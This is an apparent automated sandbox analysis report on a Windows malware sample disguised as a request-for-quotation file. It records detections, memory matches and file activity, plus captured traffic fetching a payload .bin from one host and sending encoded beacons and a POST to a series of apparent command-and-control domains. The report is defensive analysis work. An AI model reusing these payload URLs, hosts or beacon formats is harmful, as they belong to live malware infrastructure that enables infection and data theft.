Windows Analysis Report
RFQ-LOTUS 2024.exe

AV Detection

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Virustotal: Detection: 36%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	ReversingLabs: Detection: 18%

Source: RFQ-LOTUS 2024.exe	ReversingLabs: Detection: 18%
Source: RFQ-LOTUS 2024.exe	Virustotal: Detection: 36%			Perma Link

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Compliance

Source: RFQ-LOTUS 2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.110:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: RFQ-LOTUS 2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2593503966.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Minken.exe, Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp, fc.exe
Source:	Binary string: mshtml.pdbUGP source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb5q source: powershell.exe, 00000001.00000002.2596755674.0000000008C70000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,		0_2_00406370
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_0040581E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0012B5B0 FindFirstFileW,FindNextFileW,FindClose,		18_2_0012B5B0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\			Jump to behavior

Software Vulnerabilities

Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then xor eax, eax		17_2_0216C01B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then pop edi		17_2_02166F82
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then pop edi		17_2_02168DD8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 4x nop then xor eax, eax		18_2_00119290

Networking

Source: Joe Sandbox View	IP Address: 91.195.240.19 91.195.240.19
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=irRFUUIJFTw_X5vpGLyxNvjQ9lchlx96W2dFZ55OuLCLz6OAMx0ZChLKYWEmc7DJIz9qvPHZKcKrD_cp_Nu_SmSjzyQLeI0P2KT7rTufjJ_cjA2GUdoNR7K3XuwX4_yU_ilvq8K0Ck-50ZvOefEBewlxLXWhTzyb0vrnlzTubcM
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=XfXV4_tsLPb6EjW6TVfsKn-ZgtB4UhCNxFBqj-b0yxPVScwjuwN2NcTb1-gHst4PYm3HzPo4t9ndFw7SoXtrkpmSxptWu7n5PzzOZ3Qf57iMOVZNeg_M3XDxL2A5O6ZgR-iNgDFm06y0Qis0KL_8PqzkuJMzAVPq5gZ28u_0vPQ
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /wp-includes/pLykMdE/ZIbbdBq101.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: thequirkyartman.co.ukCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=S3P2x5ip62J7+Oy/khyvyepdpnn6OsRBEClp69tTyp5C0OExptGWhV1rUv2ZsdonVFK5TsIP8T+xoHN8zHMPLILivDQ16J/iew4jcSCgqKm6zoWIRy2zzVk=&Y0H=66WP HTTP/1.1Host: www.vegus24.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP HTTP/1.1Host: www.holein1sa.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP HTTP/1.1Host: www.luckydomainz.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP HTTP/1.1Host: www.qdzdvrk.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP HTTP/1.1Host: www.cngdesk.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP HTTP/1.1Host: www.shevgin.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP HTTP/1.1Host: www.wrgardenrooms.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: thequirkyartman.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.vegus24.org
Source: global traffic	DNS traffic detected: DNS query: www.maerealtysg.com
Source: global traffic	DNS traffic detected: DNS query: www.holein1sa.com
Source: global traffic	DNS traffic detected: DNS query: www.luckydomainz.shop
Source: global traffic	DNS traffic detected: DNS query: www.qdzdvrk.shop
Source: global traffic	DNS traffic detected: DNS query: www.cngdesk.com
Source: global traffic	DNS traffic detected: DNS query: www.golfscorecardus.com
Source: global traffic	DNS traffic detected: DNS query: www.theertyuiergthjk.homes
Source: global traffic	DNS traffic detected: DNS query: www.shevgin.top
Source: global traffic	DNS traffic detected: DNS query: www.sfebg.com
Source: global traffic	DNS traffic detected: DNS query: www.wrgardenrooms.co.uk

Source: unknown

HTTP traffic detected: POST /gzu1/ HTTP/1.1Host: www.holein1sa.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 204Origin: http://www.holein1sa.comReferer: http://www.holein1sa.com/gzu1/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0Data Raw: 37 42 72 34 77 56 78 3d 59 52 55 71 33 59 53 6b 50 61 43 44 65 48 65 39 71 4e 4a 76 65 2b 61 54 44 6d 54 47 4d 64 63 57 73 75 57 70 4a 4f 48 4e 69 4b 34 2f 70 62 4c 4a 42 79 75 2f 4e 6c 71 6e 50 72 4a 7a 67 53 59 65 47 37 5a 6e 78 67 46 74 64 48 54 47 6d 6a 7a 35 6c 50 75 69 6c 78 4b 75 31 6c 57 6d 6c 58 51 47 67 75 39 34 37 71 36 75 50 51 35 62 66 74 6c 58 6b 42 6f 57 62 36 6a 43 4d 55 6d 75 4b 4f 74 66 62 72 4f 69 66 4f 4e 37 52 35 34 43 71 77 51 7a 39 64 46 64 43 35 6d 37 6a 2f 73 38 59 73 33 46 44 57 36 4c 48 79 61 70 43 77 76 68 74 76 74 6d 64 30 6e 77 6a 6f 33 57 79 77 6c 32 4f 67 53 65 66 41 3d 3d Data Ascii: 7Br4wVx=YRUq3YSkPaCDeHe9qNJve+aTDmTGMdcWsuWpJOHNiK4/pbLJByu/NlqnPrJzgSYeG7ZnxgFtdHTGmjz5lPuilxKu1lWmlXQGgu947q6uPQ5bftlXkBoWb6jCMUmuKOtfbrOifON7R54CqwQz9dFdC5m7j/s8Ys3FDW6LHyapCwvhtvtmd0nwjo3Wywl2OgSefA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:08:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 3d 8f d3 40 10 ed f3 2b 06 a7 81 c2 f1 07 89 94 33 be 34 7c 94 70 45 c4 89 72 ec 1d c7 ab b3 bd 66 77 9d 23 20 24 44 75 fc 07 28 8e 92 8a 86 96 3f 83 38 e9 fe 05 bb b1 8f c4 91 75 27 9d 0b 7f bc 79 3b 6f 77 de 8c e3 07 cf 5e 3d 5d be 39 79 0e b9 2e 8b c5 28 be 79 10 b2 c5 08 cc 15 97 a4 11 d2 1c a5 22 7d ec 34 3a 73 e7 0e 78 5d 50 73 5d d0 e2 a5 d0 f0 42 34 15 83 87 e3 a9 3f 7d 14 7b 2d 3e 6a 33 28 bd 31 a4 ed bb bd 12 c1 36 f0 e1 ff a7 85 32 51 e9 08 2a 21 4b 2c e0 a8 d6 e0 bc 26 c9 b0 42 e7 49 8f 97 8a 42 c8 08 c6 be ef f7 03 09 a6 67 2b 69 b7 60 a2 59 96 ed a2 1f db 4d 58 95 3c b8 4d 36 98 df ad 9b 1d ea 96 28 57 bc 72 13 a1 b5 28 23 98 cc a8 1c 96 0e 6f 95 9e de 2d 3d 37 67 be b7 fa e3 41 f5 44 14 0c 82 60 58 7b af 6e f5 e0 ea 7b ba b5 97 77 b2 26 a9 b8 a8 0e d2 77 26 af 24 6e fa 26 db 2e 71 15 7f 4f 11 18 af 0e 1a 40 48 46 d2 d5 a2 8e 20 a8 df 81 12 05 67 30 46 c4 3e af 46 c6 78 b5 ea 88 fb 6e d9 0e 39 b0 33 e8 bb 69 19 b1 d7 75 73 ec e5 db 19 19 c5 b6 9f bb 71 c8 83 81 59 30 60 3b 07 79 b8 b8 be fc 75 fd ed fb d5 d7 1f 57 5f 7e ff bd f8 f9 e7 d3 67 93 27 ec e2 f5 6e 46 96 39 01 26 62 4d 40 52 0a 09 22 4d 1b 29 89 c1 79 ce 0b 02 6d c2 a7 94 80 22 69 6a 08 e7 a8 a0 96 22 25 a5 cc d9 60 23 1a 09 92 de 36 a4 f4 a4 95 f6 ba dc f1 9e c6 49 41 a8 08 52 53 55 4c 35 34 0a 78 66 d7 9a ec bc 3a b3 77 83 28 c0 1b 95 ed 4e 26 b0 cc d1 44 0d ef 30 35 e3 6b 48 0b 54 ea d8 e9 8c 75 76 07 0a fd 70 ea fa 33 d7 0f 21 0c 22 7f 1e cd 8e da 72 9a 55 3b 96 85 5a b8 2d aa 29 ce f6 b7 64 b1 7f 08 bf 35 fe ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 208T=@+34|pErfw# $Du(?8u'y;ow^=]9y.(y"}4:sx]Ps]B4?}{->j3(162Q*!K,&BIBg+i`YMX<M6(Wr(#o-=7gAD`X{n{w&w&$n&.qO@HF g0F>Fxn93iusqY0`;yuW_~g'nF9&bM@R"M)ym"ij"%`#6IARSUL54xf:w(N&D05kHTuvp3!"rU;Z-)d50
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:09:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 bd 8e d3 40 10 ee f3 14 83 d3 40 e1 f8 87 9c 94 33 be 34 fc 94 70 45 04 a2 1c 7b c7 f1 ea 6c af d9 5d e7 08 08 09 51 1d ef 00 05 94 54 34 b4 bc 0c e2 a4 7b 0b 76 6d 1f 89 23 eb 4e ba 2d ec f5 7c 33 f3 ed ce 37 e3 f8 de 93 17 8f 57 af 4f 9f 42 ae cb 62 39 89 af 5f 84 6c 39 01 b3 e2 92 34 42 9a a3 54 a4 4f 9c 46 67 ee c2 01 af 07 35 d7 05 2d 9f 0b 0d cf 44 53 31 b8 3f 9d fb f3 07 b1 d7 d9 27 5d 06 a5 b7 c6 a9 dd db 95 08 b6 85 f7 ff 3f ad 29 13 95 8e a0 12 b2 c4 02 8e 6b 0d ce 4b 92 0c 2b 74 1e 0d fc 52 51 08 19 c1 d4 f7 fd 21 90 60 7a b6 96 f6 08 06 cd b2 6c 87 7e e8 0e 61 59 f2 e0 26 da 60 71 3b 6f 76 c8 5b a2 5c f3 ca 4d 84 d6 a2 8c 60 76 44 e5 38 75 78 23 f5 fc 76 ea 85 b9 f3 9d d9 1f 8e b2 27 a2 60 10 04 e3 dc 7b 75 ab 47 a3 ef a8 d6 5e de d9 86 a4 e2 a2 3a 48 df 8b bc 96 b8 1d 8a 6c bb c4 55 fc 1d 45 60 b4 3a 68 00 21 19 49 57 8b 3a 82 a0 7e 0b 4a 14 9c c1 14 11 87 7e 35 32 c6 ab 75 ef b8 af 96 ed 90 03 39 83 a1 9a d6 23 f6 fa 6e 8e bd bc 9d 91 49 6c fb b9 1f 87 3c 18 99 05 63 ec e6 20 0f 97 57 df 7e 5d 7d fd 7e f9 e5 c7 e5 e7 df 7f 2f 7e fe f9 f8 c9 e4 09 7b bc de cd c8 2a 27 c0 44 6c 08 48 4a 21 41 a4 69 23 25 31 38 cf 79 41 a0 0d fc 8a 12 50 24 4d 0d e1 1c 15 d4 52 a4 a4 94 b9 1b 6c 45 23 41 d2 9b 86 94 9e 75 d4 5e 9f 3b de e3 38 2d 08 15 41 6a aa 8a a9 86 46 01 cf 6c ac c9 ce ab 33 fb 34 16 05 78 cd d2 9e 64 06 ab 1c 0d 6a fc 0e 53 33 be 81 b4 40 a5 4e 9c 5e 58 67 77 a1 d0 0f e7 ae 7f e4 fa 21 84 41 e4 1f 47 66 d3 96 d3 44 ed bc ac a9 33 77 45 35 c5 69 7f 4b d6 f6 0f c2 80 8c 9b ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 208T@@34pE{l]QT4{vm#N-|37WOBb9_l94BTOFg5-DS1?']?)kK+tRQ!`zl~aY&`q;ov[\M`vD8ux#v'`{uG^:HlUE`:h!IW:~J~52u9#nIl<c W~]}~/~{*'DlHJ!Ai#%18yAP$MRlE#Au^;8-AjFl34xdjS3@N^Xgw!AGfD3wE5iK0
